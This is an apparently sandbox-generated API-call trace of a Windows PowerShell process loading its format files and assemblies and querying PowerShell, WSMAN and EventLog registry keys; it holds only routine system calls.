	[0816.899] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xc55802ea, Data2=0x9ef1, Data3=0x496d, Data4=([0]=0x8e, [1]=0x31, [2]=0xcd, [3]=0x4e, [4]=0xdf, [5]=0x23, [6]=0xcd, [7]=0x66))) returned 0x0
	[0816.899] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x9191517d, Data2=0xc102, Data3=0x4ab8, Data4=([0]=0x8b, [1]=0xd8, [2]=0x36, [3]=0xe9, [4]=0x5e, [5]=0xca, [6]=0x56, [7]=0xc6))) returned 0x0
	[0816.899] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x693ddcf1, Data2=0xeffb, Data3=0x47c0, Data4=([0]=0x81, [1]=0x18, [2]=0xfd, [3]=0x81, [4]=0x21, [5]=0xce, [6]=0xdc, [7]=0x90))) returned 0x0
	[0816.899] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x35d09909, Data2=0xa504, Data3=0x4c41, Data4=([0]=0xa9, [1]=0x61, [2]=0xb9, [3]=0x6d, [4]=0x26, [5]=0xc4, [6]=0x79, [7]=0x5e))) returned 0x0
	[0816.900] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x51bfd0bb, Data2=0xd444, Data3=0x4c0c, Data4=([0]=0xbd, [1]=0x49, [2]=0x15, [3]=0xd8, [4]=0x43, [5]=0x91, [6]=0xcb, [7]=0x2a))) returned 0x0
	[0816.900] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x4547fc1c, Data2=0xeb22, Data3=0x4554, Data4=([0]=0xbf, [1]=0x41, [2]=0xea, [3]=0xe3, [4]=0x44, [5]=0x5d, [6]=0x1b, [7]=0xd5))) returned 0x0
	[0816.900] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x218ce206, Data2=0xe80f, Data3=0x426f, Data4=([0]=0xb5, [1]=0x8a, [2]=0x88, [3]=0x6a, [4]=0xe5, [5]=0xc7, [6]=0xbe, [7]=0x10))) returned 0x0
	[0816.900] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x341d0362, Data2=0xed2a, Data3=0x4872, Data4=([0]=0x94, [1]=0x48, [2]=0xc8, [3]=0x18, [4]=0xf6, [5]=0x9c, [6]=0xc0, [7]=0xfe))) returned 0x0
	[0816.900] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x94404b84, Data2=0x1072, Data3=0x48a1, Data4=([0]=0x94, [1]=0x32, [2]=0x81, [3]=0xc1, [4]=0x3f, [5]=0xb, [6]=0xd6, [7]=0x1f))) returned 0x0
	[0816.901] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xada03298, Data2=0x38dd, Data3=0x49fe, Data4=([0]=0x97, [1]=0x52, [2]=0x94, [3]=0x45, [4]=0x20, [5]=0x55, [6]=0xe1, [7]=0x46))) returned 0x0
	[0816.901] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe1673fdc, Data2=0x69ee, Data3=0x49bd, Data4=([0]=0xa5, [1]=0x2, [2]=0x15, [3]=0x33, [4]=0x8b, [5]=0x4, [6]=0x8e, [7]=0xc5))) returned 0x0
	[0816.901] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x2523eb32, Data2=0xf2f3, Data3=0x471b, Data4=([0]=0xb8, [1]=0x50, [2]=0xe2, [3]=0xa6, [4]=0x14, [5]=0x9f, [6]=0x8b, [7]=0x4b))) returned 0x0
	[0816.901] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe2648765, Data2=0x4e6a, Data3=0x496d, Data4=([0]=0x80, [1]=0x3c, [2]=0xcf, [3]=0xb2, [4]=0x3d, [5]=0x73, [6]=0xd3, [7]=0xfc))) returned 0x0
	[0816.901] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0816.901] GetFileType (hFile=0x2f8) returned 0x1
	[0816.902] SetErrorMode (uMode=0x1) returned 0x1
	[0816.902] GetFileType (hFile=0x2f8) returned 0x1
	[0816.902] ReadFile (in: hFile=0x2f8, lpBuffer=0x327d338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x327d338*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.902] ReadFile (in: hFile=0x2f8, lpBuffer=0x327d338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x327d338*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.902] ReadFile (in: hFile=0x2f8, lpBuffer=0x327d338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x327d338*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.902] ReadFile (in: hFile=0x2f8, lpBuffer=0x327d338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x327d338*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.911] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eefba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2eefba0*, lpNumberOfBytesRead=0x12d458*=0x8b4, lpOverlapped=0x0) returned 1
	[0816.911] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eef814, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2eef814*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0816.911] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eefba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2eefba0*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0816.911] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x2f8) returned 0x0
	[0816.912] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0816.912] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0816.912] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0816.912] CoTaskMemFree (pv=0x1b8497b0) 
	[0816.912] RegCloseKey (hKey=0x2f8) returned 0x0
	[0816.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0816.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0816.914] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3bc3bd75, Data2=0xd622, Data3=0x47a1, Data4=([0]=0xa9, [1]=0xa8, [2]=0x8c, [3]=0x92, [4]=0x8d, [5]=0x44, [6]=0x69, [7]=0xe6))) returned 0x0
	[0816.914] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x93255f23, Data2=0x7fcb, Data3=0x4caf, Data4=([0]=0x9e, [1]=0x1f, [2]=0x84, [3]=0x10, [4]=0xf8, [5]=0x47, [6]=0x79, [7]=0x2))) returned 0x0
	[0816.915] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0816.915] GetFileType (hFile=0x2f8) returned 0x1
	[0816.915] SetErrorMode (uMode=0x1) returned 0x1
	[0816.915] GetFileType (hFile=0x2f8) returned 0x1
	[0816.915] ReadFile (in: hFile=0x2f8, lpBuffer=0x2f266a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2f266a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x2f266a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2f266a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x2f266a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2f266a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x2f266a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2f266a0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0816.917] ReadFile (in: hFile=0x2f8, lpBuffer=0x2f266a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2f266a0*, lpNumberOfBytesRead=0x12d458*=0xe98, lpOverlapped=0x0) returned 1
	[0816.917] ReadFile (in: hFile=0x2f8, lpBuffer=0x2f25ca0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2f25ca0*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0816.917] ReadFile (in: hFile=0x2f8, lpBuffer=0x2f266a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x2f266a0*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0816.917] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x2f8) returned 0x0
	[0816.917] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0816.917] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0816.917] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0816.917] CoTaskMemFree (pv=0x1b8497b0) 
	[0816.918] RegCloseKey (hKey=0x2f8) returned 0x0
	[0816.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0816.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0816.918] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe33a8dda, Data2=0x1139, Data3=0x49ce, Data4=([0]=0xa7, [1]=0x57, [2]=0xcd, [3]=0x28, [4]=0x4f, [5]=0x75, [6]=0x73, [7]=0xc9))) returned 0x0
	[0816.918] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x18ea357d, Data2=0xd48c, Data3=0x4967, Data4=([0]=0xa3, [1]=0x83, [2]=0x1d, [3]=0x90, [4]=0xda, [5]=0x66, [6]=0x44, [7]=0xb3))) returned 0x0
	[0818.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0818.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0818.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0818.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0818.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0818.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0818.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0818.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0818.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0818.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0818.416] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0818.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.416] CoTaskMemFree (pv=0x2a6990) 
	[0818.418] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0818.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.418] CoTaskMemFree (pv=0x2a6990) 
	[0818.419] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0818.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.419] CoTaskMemFree (pv=0x2a6990) 
	[0818.421] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0818.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0818.421] CoTaskMemFree (pv=0x2a6990) 
	[0819.644] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0819.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0819.645] CoTaskMemFree (pv=0x2a6990) 
	[0819.650] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0819.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0819.650] CoTaskMemFree (pv=0x2a6990) 
	[0819.651] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0819.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0819.652] CoTaskMemFree (pv=0x2a6990) 
	[0819.657] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6f8 | out: phkResult=0x12d6f8*=0x2f8) returned 0x0
	[0821.579] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d5fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0821.579] CoTaskMemFree (pv=0x0) 
	[0821.580] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0821.580] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x283d90, lpcchValueName=0x12d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0821.580] CoTaskMemFree (pv=0x283d90) 
	[0821.580] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0821.580] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x283d90, lpcchValueName=0x12d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0821.580] CoTaskMemFree (pv=0x283d90) 
	[0821.580] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0821.581] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x283d90, lpcchValueName=0x12d6a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d6a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0821.581] CoTaskMemFree (pv=0x283d90) 
	[0821.582] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d68c, lpData=0x0, lpcbData=0x12d688*=0x0 | out: lpType=0x12d68c*=0x1, lpData=0x0, lpcbData=0x12d688*=0x8) returned 0x0
	[0821.582] CoTaskMemAlloc (cb=0xc) returned 0x1b82b210
	[0821.582] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d65c, lpData=0x1b82b210, lpcbData=0x12d658*=0x8 | out: lpType=0x12d65c*=0x1, lpData="2.0", lpcbData=0x12d658*=0x8) returned 0x0
	[0821.582] CoTaskMemFree (pv=0x1b82b210) 
	[0830.121] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d648 | out: phkResult=0x12d648*=0xe4) returned 0x0
	[0830.121] RegQueryInfoKeyW (in: hKey=0xe4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d54c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d548*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0830.121] CoTaskMemFree (pv=0x0) 
	[0830.121] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0830.121] RegEnumValueW (in: hKey=0xe4, dwIndex=0x0, lpValueName=0x283d90, lpcchValueName=0x12d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0830.121] CoTaskMemFree (pv=0x283d90) 
	[0830.121] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0830.121] RegEnumValueW (in: hKey=0xe4, dwIndex=0x1, lpValueName=0x283d90, lpcchValueName=0x12d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0830.122] CoTaskMemFree (pv=0x283d90) 
	[0830.122] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0830.122] RegEnumValueW (in: hKey=0xe4, dwIndex=0x2, lpValueName=0x283d90, lpcchValueName=0x12d5f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d5f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0830.122] CoTaskMemFree (pv=0x283d90) 
	[0830.122] RegQueryValueExW (in: hKey=0xe4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d5dc, lpData=0x0, lpcbData=0x12d5d8*=0x0 | out: lpType=0x12d5dc*=0x1, lpData=0x0, lpcbData=0x12d5d8*=0x8) returned 0x0
	[0830.122] CoTaskMemAlloc (cb=0xc) returned 0x1b82b1b0
	[0830.122] RegQueryValueExW (in: hKey=0xe4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d5ac, lpData=0x1b82b1b0, lpcbData=0x12d5a8*=0x8 | out: lpType=0x12d5ac*=0x1, lpData="2.0", lpcbData=0x12d5a8*=0x8) returned 0x0
	[0830.122] CoTaskMemFree (pv=0x1b82b1b0) 
	[0830.123] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0830.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0830.124] CoTaskMemFree (pv=0x2a6990) 
	[0830.133] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0830.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0830.133] CoTaskMemFree (pv=0x2a6990) 
	[0832.742] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d678 | out: phkResult=0x12d678*=0x308) returned 0x0
	[0832.746] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d5ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d5ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d5e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.746] CoTaskMemFree (pv=0x0) 
	[0832.747] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0832.747] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x283d90, lpcchName=0x12d678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0832.747] CoTaskMemFree (pv=0x283d90) 
	[0832.747] CoTaskMemFree (pv=0x0) 
	[0832.747] CoTaskMemAlloc (cb=0x204) returned 0x283d90
